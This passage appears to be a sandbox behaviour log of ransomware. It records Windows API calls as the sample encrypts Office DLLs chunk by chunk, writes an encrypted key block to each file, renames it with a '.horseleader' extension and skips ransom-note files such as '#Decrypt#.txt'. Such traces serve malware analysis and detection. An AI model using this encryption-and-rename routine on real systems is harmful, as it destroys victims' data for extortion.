lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.548] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.548] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.548] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x6b5cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.548] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.592] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.593] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.593] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd6b98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.593] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.616] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.616] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.617] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.617] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0239.617] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0239.617] CloseHandle (hObject=0x158) returned 1 [0239.617] GetProcessHeap () returned 0x780000 [0239.617] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0239.617] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.horseleader") returned 83 [0239.618] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexcl.dll.horseleader")) returned 1 [0239.619] GetProcessHeap () returned 0x780000 [0239.619] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0239.619] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95c9c200, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd813d460, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x95c9c200, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0x53bb0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEODBC.DLL", cAlternateFileName="")) returned 1 [0239.619] lstrcmpiW (lpString1="ACEODBC.DLL", lpString2="Windows") returned -1 [0239.619] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 71 [0239.619] StrStrIW (lpFirst="ACEODBC.DLL", lpSrch=".horseleader") returned 0x0 [0239.619] lstrcmpW (lpString1="ACEODBC.DLL", lpString2="#Decrypt#.txt") returned 1 [0239.619] lstrcmpW (lpString1="ACEODBC.DLL", lpString2="_uninstalling_.png") returned 1 [0239.619] lstrlenW (lpString=".testttjffg") returned 11 [0239.619] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL", lpSrch=".testttjffg") returned 0x0 [0239.619] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0239.619] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0239.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0239.620] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 71 [0239.620] StrStrW (lpFirst="ACEODBC.DLL", lpSrch=".txt") returned 0x0 [0239.620] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=342960) returned 1 [0239.620] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.620] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.676] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0239.676] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0239.677] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x275d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.677] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0240.605] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0240.605] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0240.605] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4ebb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.605] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0240.901] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0240.902] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0240.902] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.902] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0240.902] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0240.903] CloseHandle (hObject=0x158) returned 1 [0240.903] GetProcessHeap () returned 0x780000 [0240.903] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0240.903] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.horseleader") returned 83 [0240.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodbc.dll.horseleader")) returned 1 [0240.905] GetProcessHeap () returned 0x780000 [0240.906] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0240.906] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x51128590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEODDBS.DLL", cAlternateFileName="")) returned 1 [0240.906] lstrcmpiW (lpString1="ACEODDBS.DLL", lpString2="Windows") returned -1 [0240.906] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 72 [0240.906] StrStrIW (lpFirst="ACEODDBS.DLL", lpSrch=".horseleader") returned 0x0 [0240.906] lstrcmpW (lpString1="ACEODDBS.DLL", lpString2="#Decrypt#.txt") returned 1 [0240.906] lstrcmpW (lpString1="ACEODDBS.DLL", lpString2="_uninstalling_.png") returned 1 [0240.906] lstrlenW (lpString=".testttjffg") returned 11 [0240.906] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL", lpSrch=".testttjffg") returned 0x0 [0240.907] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0240.907] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0240.907] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0240.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 72 [0240.908] StrStrW (lpFirst="ACEODDBS.DLL", lpSrch=".txt") returned 0x0 [0240.908] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15800) returned 1 [0240.908] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.006] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc248, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.006] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3db8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.006] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.006] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0241.006] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0241.007] CloseHandle (hObject=0x158) returned 1 [0241.007] GetProcessHeap () returned 0x780000 [0241.007] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0241.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.horseleader") returned 84 [0241.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.horseleader")) returned 1 [0241.008] GetProcessHeap () returned 0x780000 [0241.008] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0241.008] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x5e99f630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEODEXL.DLL", cAlternateFileName="")) returned 1 [0241.008] lstrcmpiW (lpString1="ACEODEXL.DLL", lpString2="Windows") returned -1 [0241.008] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 72 [0241.008] StrStrIW (lpFirst="ACEODEXL.DLL", lpSrch=".horseleader") returned 0x0 [0241.008] lstrcmpW (lpString1="ACEODEXL.DLL", lpString2="#Decrypt#.txt") returned 1 [0241.008] lstrcmpW (lpString1="ACEODEXL.DLL", lpString2="_uninstalling_.png") returned 1 [0241.008] lstrlenW (lpString=".testttjffg") returned 11 [0241.008] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL", lpSrch=".testttjffg") returned 0x0 [0241.008] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0241.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0241.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0241.180] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 72 [0241.180] StrStrW (lpFirst="ACEODEXL.DLL", lpSrch=".txt") returned 0x0 [0241.180] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15800) returned 1 [0241.180] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc248, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.182] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3db8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.182] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0241.182] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0241.182] CloseHandle (hObject=0x158) returned 1 [0241.183] GetProcessHeap () returned 0x780000 [0241.183] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0241.183] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.horseleader") returned 84 [0241.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodexl.dll.horseleader")) returned 1 [0241.184] GetProcessHeap () returned 0x780000 [0241.184] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0241.184] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0x5e99f630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x3db8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEODTXT.DLL", cAlternateFileName="")) returned 1 [0241.184] lstrcmpiW (lpString1="ACEODTXT.DLL", lpString2="Windows") returned -1 [0241.184] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 72 [0241.184] StrStrIW (lpFirst="ACEODTXT.DLL", lpSrch=".horseleader") returned 0x0 [0241.184] lstrcmpW (lpString1="ACEODTXT.DLL", lpString2="#Decrypt#.txt") returned 1 [0241.184] lstrcmpW (lpString1="ACEODTXT.DLL", lpString2="_uninstalling_.png") returned 1 [0241.184] lstrlenW (lpString=".testttjffg") returned 11 [0241.184] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL", lpSrch=".testttjffg") returned 0x0 [0241.184] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0241.184] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0241.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0241.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 72 [0241.185] StrStrW (lpFirst="ACEODTXT.DLL", lpSrch=".txt") returned 0x0 [0241.185] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15800) returned 1 [0241.185] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.307] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc248, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.307] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3db8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3db8, lpOverlapped=0x0) returned 1 [0241.308] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.308] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0241.308] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0241.308] CloseHandle (hObject=0x158) returned 1 [0241.308] GetProcessHeap () returned 0x780000 [0241.308] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0241.308] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.horseleader") returned 84 [0241.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceodtxt.dll.horseleader")) returned 1 [0241.309] GetProcessHeap () returned 0x780000 [0241.309] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0241.309] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd8189720, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x833a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEOLEDB.DLL", cAlternateFileName="")) returned 1 [0241.309] lstrcmpiW (lpString1="ACEOLEDB.DLL", lpString2="Windows") returned -1 [0241.309] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 72 [0241.310] StrStrIW (lpFirst="ACEOLEDB.DLL", lpSrch=".horseleader") returned 0x0 [0241.310] lstrcmpW (lpString1="ACEOLEDB.DLL", lpString2="#Decrypt#.txt") returned 1 [0241.310] lstrcmpW (lpString1="ACEOLEDB.DLL", lpString2="_uninstalling_.png") returned 1 [0241.310] lstrlenW (lpString=".testttjffg") returned 11 [0241.310] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL", lpSrch=".testttjffg") returned 0x0 [0241.310] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: 